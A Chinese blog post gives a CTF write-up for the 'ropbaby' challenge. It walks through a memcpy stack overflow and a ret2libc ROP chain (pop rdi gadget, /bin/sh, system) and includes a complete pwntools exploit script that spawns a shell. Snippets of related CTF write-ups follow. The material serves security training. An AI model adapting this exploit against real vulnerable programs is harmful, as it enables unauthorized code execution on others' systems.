实验吧_ROPBABY

最新推荐文章于 2019-07-28 03:06:47 发布
原创 最新推荐文章于 2019-07-28 03:06:47 发布 · 453 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客围绕栈溢出实验展开,目的是检验前期对栈溢出的掌握程度。给出了实验文件的百度网盘链接及提取码。详细阐述实验步骤,先检验保护机制,发现可进行栈溢出,经静态分析找到溢出点,还说明了后续构造gadget、找地址等步骤,最后给出构造的payload及exp.py。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验目的

用过这次实验去检验我们前期对栈溢出的掌握程度

实验文件

链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA
提取码:qbp9

实验步骤

首先检验ropbaby的保护机制
在这里插入图片描述
发现栈是no canary found,我们可以进行栈溢出。
首先对文件进行静态分析
在这里插入图片描述
发现了 memcpy(&savedregs, nptr, v8),savedregs是_int64型,只有8字节的空间,而nptr有1088字节,这就造成了栈溢出。
因此我们需要做的步骤如下:
1.找到程序漏洞(即溢出点)
2.构造一个gadget,包含pop rdi | retn
3.在libc中找到/bin/sh字符串的地址,送入rdi寄存器
4.找到system函数地址,并使得程序跳转执行system函数

然后进行动态分析
在这里插入图片描述
下面选取有用的:

ROPgadget --binary libc-2.23.so  --only "pop|ret"
0x0000000000020256 : pop rdi ; pop rbp ; ret
0x0000000000021102 : pop rdi ; ret  //这一段就是我们要的gadget,偏移量是0x21102
0x0000000000067499 : pop rdi ; ret 0xffff

下面找到/bin/sh在libc中的地址
在这里插入图片描述
由于程序允许我们查找system的地址,因此我们考虑找到system函数的偏移在这里插入图片描述
0x45390即为system的偏移
所以我们可以构造payload = ‘a’*8 + p64(gaget_addr) + p64(bin_addr) + p64(system_addr)

附上exp.py

#coding=utf-8
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./ropbaby')
p.recvuntil(':')
p.recvuntil(':')
p.sendline('2')
p.recvuntil(':')
p.sendline('system')
p.recvuntil(':')
system_addr=int(p.recv(19),16)#这里":"之后还有一个空格,我一开始只接收18个字符    
print "system_addr="+hex(system_addr)
base_addr=system_addr-0x45390 #libc加载的基地址
print "base_addr="+hex(base_addr)
bin_addr=0x18cd17
bin_addr=base_addr+bin_addr
print "bin_addr="+hex(bin_addr)
gaget_addr=0x21102
gaget_addr=base_addr+gaget_addr
print "gaget_addr="+hex(gaget_addr)
payload = 'a'*8 + p64(gaget_addr) + p64(bin_addr) + p64(system_addr)
print p.recvuntil(':')
print "-------------------------------------------------------------"
p.sendline("3")
p.recvuntil(':')
p.sendline('32')
print payload
p.sendline(payload)
p.interactive()
Han&Joe
关注
实验
qq_42137684的博客
02-24 875
1.变异凯撒 把flag转化为ascii码,加密密文转化为ascii码, 因为是凯撒加密,所以思考移动的位数,分别是加了5,6,7,8.。。。  所以移动的位次是从5递加   得到结果    ascii码值转化,得到flag, flag{Caesar_variation}。 2.奇怪的短信   根据题目提示,是奇怪的短信,然后一串不长的阿拉伯数字,把手机键盘...
实验吧——WEB-FALSE
迷风小白
04-12 2784
FALSE hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o 查看源码 <?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password c...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
1.实验吧_ropbaby(西普杯CTF)_onegadget
Jc
05-26 478
分析 1.先查看文件位数,安全机制 2.查看strings,调用函数(特别注意常见的函数) 漏洞点 EXP from pwn import * context.log_level = "debug" p = process('./ropbaby') p.recvuntil(': ') p.sendline('2') p.recvuntil('Enter symbol: ') p.send...
实验吧(1)
Monkey233333的博客
08-19 412
实验吧真是一个神奇的地方,里面的东西表示全部都看不懂,emmmmm  ,加油!好好学习!  案例:忘记密码了! 在实验吧里面打开解题链接,然后就会跳转到一个输入密码的页面,当然你是不知道密码的,所以这题是寻找密码。 是这样的一个页面,然后随便输入一串数字,一般来说都是错误的,然后你打开网页的源文件   在网页控制台上复制代码,就可以解出a的值。  ...
实验吧-----IHDR
weixin_40709439的博客
08-09 4154
解题链接: http://ctf5.shiyanbar.com/stega/IHDR.png 有点坑哈,点开链接发现图片因存在错误而无法显示,一开始我是以为题目炸了,直接跳过。后来才知道。。。坑 可以利用脚本下载 import requests import io,sys sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encod...
#实验吧--MISC
DVK
12-08 855
1.MD5之守株待兔,你需要找到和系统锁匹配的钥匙 GET方式提交一个key,得到key的md5。 几次提交发现:系统生成的md5是随机的。联想随机数据发现:提交速度快时系统的md5是不变的。 因此可以猜测:系统的md5是否是和时间有关?尝试用时间的几个组合。。。未果 试试直接用py的获取时间函数。 成功了。 这题要熟悉一下1、py request包的使用,2、py time.time...
实验吧-简单的sql注入 Writeup
baynk的博客
07-28 475
又弄了一个,虽然说不难,但是这个有点蛋疼- -,有些地方坑了好久。。。 过程 一开始就是简单的输入数值进行查询,加引号后发现有报错。 单引号闭合,试过了#和-- 都被过滤了,没法使用,所以试试自己闭合,这次是OK的。 回显点应该只有一个,就是name了,这里就不试order by 了。直接union select,但是union select好像都被过滤了。试了下双写,发现过滤的时候如果最后不是...
实验吧_pilot
weixin_44681716的博客
05-04 529
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA 提取码:5d4d 实验步骤 首先对pilot的保护机制进行检验 发现程序没有开启任何保护,且有可读、可写、可执行段,说明我们可以进行栈溢出操作。 对文件进行静态分析: 其实pilot前面的一大段都没有什么用,我们只需要看输入函数...
实验吧 认真一点
xingyyn78的博客
03-30 7198
        本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ...............        使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。        但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该...
实验吧 认真一点!
Assassin
01-31 3155
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这
实验吧CTF-web
code_lab
02-27 6497
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
实验吧———小苹果
落花四月
03-29 1062
今天我很开心,因为我有了第一个粉丝,这也在指引着我,让我继续努力着!我会加油好好学习,坚持每天为你们这些 小可爱更新更优质的文章! 永远爱你们的 ————新宝宝 1:最低位亲吻; 解题思路:这题正常的套路应该是取出每个像素的最低位(0或1按照0黑1白不行的话再反色)来得到二维码,不过我们不走寻常路,将bmp在画图中另存为png格式就可以了,因为我们png时偶然发现左上角有二维码的感...
实验吧--天下武功为快不破
qq_41281571的博客
07-31 496
实验吧–天下武功为快不破 知识点: 在python中,对于base64加密解密方法的流程和注意点 先要引入base64库,import base64 加密: 结果=base64.b64encode(要加密的字符串) 解密:结果=base64.b64decode(要解密的字符串) 千万要注意:要解密的字符串要符合base64的格式,比方说后面要有两个等号。而且,解密后的值并不是字符串类型。也...
实验吧-NSCTF web200
臭nana的博客
04-25 277
直接写个php脚本跑 <?php $str="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $_=""; $_o = base64_decode(strrev(str_rot13($str))); for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0...
实验吧——九连环
Sn1P3r的博客
10-29 1280
【九连环】 拿到题目后,发现是一张图片,拉入winhex后,未发现异常,那就直接binwalk,发现内有玄机 用binwalk -e分离后发现一张图片和一个压缩包 压缩包需要密码,我们只好先从图片下手,用stegsolve和binwalk都没有任何发现,我们想到用steghide来查看一下 我们发现有一个ko.txt的文件,这个应该就是压缩包的密码所在了 用steghide ...
实验吧之让我进去
Au
05-11 2653
  http://ctf5.shiyanbar.com/web/kzhan.php    随便提交一些东西 没有回显  源代码没提示   直接bp       发现可疑的source  变成1看看  go   暴源码了 分析代码:的条件    首先判断cookie:getmein 是否为空  (我们从bp这里看是没有这个cookie的,需要自己构造) 接着判断 你提...
实验吧 NSCTF web200
3tu6b0rn的博客
03-25 499
题目链接:http://ctf5.shiyanbar.com/web/web200.jpg 加密 function encode ($str){ $_o = strrev($str); // 反转字符串 for ($_0=0;$_O<strlen($_o);$_O++); { // 所有字符ASCII值+1 $_c = substr($_o,$_O, 1)...
实验吧-MD5之守株待兔
Quinlan_的博客
03-24 879
这道题打开链接后 http://ctf5.shiyanbar.com/misc/keys/keys.php 而刷新一下以后,系统密钥会发生变化,每次刷新这个md5解码后的数字都会变大,猜测和时间有关,根据题目描述,这道题只要当自己的密钥和系统的密钥匹配上就可以得到flag。 一种方法是刷新一下页面,快速复制系统密钥然后解密把解密到的数字返回到url上,把数字改稍微大点,刷新,当系统密钥刚好和...
实验吧 RE 题解
xaphoenix的博客
06-01 2401
babyCrack利用PEID发现是.NET程序,没有加壳,直接用IDA查看 得到key hctf{bABy_CtsvlmE_!} 阿拉丁神灯利用PEID发现是.NET程序,没有加壳,直接用IDA查看 将这串字符输入到页面中,得到key UnPack&Crack2011!! 证明自己吧利用PEID发现是C程序,没有加壳,直接用IDA查看 先F5 main函数 显然判断密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值